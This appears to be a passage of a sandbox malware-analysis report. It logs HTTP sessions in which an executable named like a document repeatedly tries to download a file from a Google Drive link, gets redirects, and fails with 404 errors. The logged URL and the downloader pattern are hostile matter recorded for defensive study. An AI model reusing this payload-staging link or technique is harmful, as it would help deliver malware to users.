                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.649837172.217.19.1744434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:57:57 UTC418OUTGET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:57:58 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:57:58 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-HfrIzqjrfJ-NTdR5RRaJ8A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.649843142.250.181.14434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:00 UTC460OUTGET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:01 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC5bUB0kABd5YNamKEYeXgAAr2_8co0-ZS7cngZwnd4-FSUPM28GCusX9jwxKZLQMMIs
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:00 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-NK0SWxPBuPpqb3kA5ZGMpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:01 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 73 59 55 46 51 79 70 39 7a 43 66 4e 43 62 73 62 57 78 2d 49 71 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="sYUFQyp9zCfNCbsbWx-IqA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.649849172.217.19.1744434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:03 UTC418OUTGET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:04 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:04 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-ihDW8fMI5mvjkdXtzuT-iw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.649855142.250.181.14434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:06 UTC460OUTGET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:07 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC4L9L_5xGIOBGxGvzwlgDuEV4sAUuS5KMFzRHVyZP3o7EVe1bHCElAeMdUyCGbR4kdT
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:06 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-mV48Bs3rtx-9UWh8K119sw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:07 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 4c 68 75 51 63 66 79 2d 6d 38 4b 30 39 43 43 4f 35 58 73 57 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1LhuQcfy-m8K09CCO5XsWw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.649863172.217.19.1744434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:09 UTC418OUTGET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:10 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:09 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-sfq__Lw9K2jxxD5gr2niWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.649874142.250.181.14434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:12 UTC460OUTGET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:13 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC6lRNZc6u7DJPO2HzKnuWftVgwaVWAIKGIlYgL1a_ZIcerDNNpfhSpbx7-pG4zARFrZ
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:12 GMT
                                                        Content-Security-Policy: script-src 'nonce-fCxnZETHthfpMs051sAoHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:13 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 76 67 71 6a 65 6e 76 61 6a 36 4c 69 6f 50 61 30 76 57 57 47 58 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vgqjenvaj6LioPa0vWWGXg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.649880172.217.19.1744434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:14 UTC418OUTGET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:15 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:15 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-W1WemoriBuqAL-nzFoXumg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.2.649886142.250.181.14434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:17 UTC460OUTGET /download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=g7RKIOXkAS_Fb_yyo7ptoc_mU30wW4qHYuOU9-Zl4wQ2-nfdFfePhLzVGcDTkg_diPrOXYK4yjap3eyOhlMWWi3lb_8KsWInVL_NMS8QUyHQzzcQjixbPh43wHfCTWuVIbU8UIs9IdcPcrKGPKC0I0XI40E07g6Af8d4gYeFMT0wM-4ABGL6s6Xz
                                                        2024-12-16 16:58:18 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC70sfg7GGe-rm1nh9YPmU_wWbI51LQ_M26X60qUXXEgtkVx_EnBAXMAO1lD0Educ1VO
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:18 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-QRQeOCPHesK7WpgSOgqZdA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
